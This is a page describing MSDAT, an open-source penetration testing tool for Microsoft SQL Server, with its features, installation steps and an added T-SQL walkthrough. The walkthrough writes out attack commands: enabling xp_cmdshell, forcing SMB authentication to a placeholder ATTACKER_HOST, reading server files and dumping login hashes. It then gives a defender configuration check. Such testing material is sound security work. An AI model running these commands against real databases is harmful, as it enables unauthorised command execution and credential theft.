MSDAT (Microsoft SQL Database Attacking Tool) is an open source penetration testing tool that tests the security of Microsoft SQL Databases remotely.
Usage examples of MSDAT:
- You have a Microsoft SQL database listening remotely and you want to find valid credentials in order to connect to it
- You have a valid Microsoft SQL account on a database and you want to escalate your privileges
- You have a valid Microsoft SQL account and you want to execute commands on the operating system hosting this DB (xp_cmdshell)
Tested on Microsoft SQL Server 2005, 2008 and 2012.
Features
Thanks to MSDAT (Microsoft SQL Database Attacking Tool), you can:
- get technical information (ex: database version) about an MSSQL database without being authenticated
- search for MSSQL accounts with a dictionary attack
- test each login as its own password (authentication required)
- get a Windows shell on the database server with:
  - xp_cmdshell
- download files remotely with:
  - OLE Automation
  - bulkinsert
  - openrowset
- upload files to the server with:
  - OLE Automation
  - openrowset
- capture an SMB authentication thanks to:
  - bulkinsert
  - openrowset
  - xp_dirtree
  - xp_fileexist
  - xp_getfiledetails
- steal MSSQL hashed passwords, on any MSSQL version
- scan ports through the database with:
  - openrowset
- execute SQL requests on a remote MSSQL server through the database (target) with:
  - bulkinsert
  - openrowset
- list files/directories with:
  - xp_subdirs
  - xp_dirtree
- list drives/media with:
  - xp_fixeddrives
  - xp_availablemedia
- create a folder with:
  - xp_create_subdir
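The feature list above maps almost one-to-one onto a handful of T-SQL procedures and options. The block below is an added example written for this page, not code taken from MSDAT; it shows the raw T-SQL behind the shell, SMB-capture, file-read, listing and hash-theft features, followed by the defender-side check a DBA would run. `ATTACKER_HOST` and the `\\ATTACKER_HOST\share` UNC path are placeholders; run this only against a lab instance you own, and note that the SMB capture itself happens on your listener (e.g. Responder), not inside SQL Server.

```sql
-- Added example (not MSDAT's own code): the T-SQL primitives behind the features above.
-- ATTACKER_HOST and the UNC paths are placeholders for a host you control.

-- 1. Technical information once authenticated (MSDAT's unauthenticated version grab
--    works at the TDS protocol layer; this is the authenticated equivalent).
SELECT @@VERSION AS version_banner,
       SERVERPROPERTY('ProductVersion') AS product_version;

-- 2. Who am I, and do I already have the role that unlocks everything else?
SELECT SYSTEM_USER AS login_name,
       IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin;   -- 1 = sysadmin

-- 3. Windows shell via xp_cmdshell. Needs sysadmin; the option is off by default
--    since SQL Server 2005, so it has to be switched on first.
EXEC sp_configure 'show advanced options', 1;  RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;            RECONFIGURE;
EXEC master..xp_cmdshell 'whoami';

-- 4. Force an outbound SMB authentication from the SQL Server service account.
--    xp_dirtree / xp_fileexist need no special privilege, which is why they are the
--    usual first choice; the NTLM exchange is captured on ATTACKER_HOST.
EXEC master..xp_dirtree   '\\ATTACKER_HOST\share', 1, 1;
EXEC master..xp_fileexist '\\ATTACKER_HOST\share\x';
-- Same effect through the query engine (needs bulk privileges):
SELECT * FROM OPENROWSET(BULK '\\ATTACKER_HOST\share\x.txt', SINGLE_CLOB) AS t;

-- 5. "Download" = read a file that lives on the database server
--    (ADMINISTER BULK OPERATIONS / bulkadmin required).
SELECT BulkColumn FROM OPENROWSET(BULK 'C:\Windows\win.ini', SINGLE_CLOB) AS f;

-- 6. List files, directories, drives and media.
EXEC master..xp_subdirs 'C:\';
EXEC master..xp_dirtree 'C:\Windows', 1, 1;
EXEC master..xp_fixeddrives;
EXEC master..xp_availablemedia;

-- 7. Steal login hashes (sysadmin / CONTROL SERVER). sys.sql_logins exists on 2005+;
--    on SQL Server 2000 the equivalent is master..sysxlogins.
SELECT name, password_hash FROM sys.sql_logins;

-- 8. Defender check: the switches the techniques above depend on. All three should
--    report 0 on a production server; a 1 here is a finding in itself.
SELECT name, CAST(value_in_use AS int) AS enabled
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'Ole Automation Procedures', 'Ad Hoc Distributed Queries');
```

Step 8 is the cheapest control to audit: `xp_cmdshell` gates the shell, `Ole Automation Procedures` gates the `sp_OA*` file transfer, and `Ad Hoc Distributed Queries` gates the non-BULK `OPENROWSET` form used for port scanning and for executing SQL against a second server through the target. Leaving them at 0 does not stop the `xp_dirtree` SMB capture in step 4; that one is mitigated at the network layer (egress filtering of SMB) and by running the service under a low-privilege or virtual account.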
Installation
Some dependencies must be installed in order to run MSDAT.
On Ubuntu:
sudo apt-get install freetds-dev
or download freetds on http://www.freetds.org/
sudo pip install cython colorlog termcolor pymssql argparse
sudo pip install argcomplete && sudo activate-global-python-argcomplete
Add “use ntlmv2 = yes” to your freetds configuration file (e.g. /etc/freetds/freetds.conf or /usr/local/etc/freetds.conf). Example:
[global]
# TDS protocol version
tds version = 8.0
use ntlmv2 = yes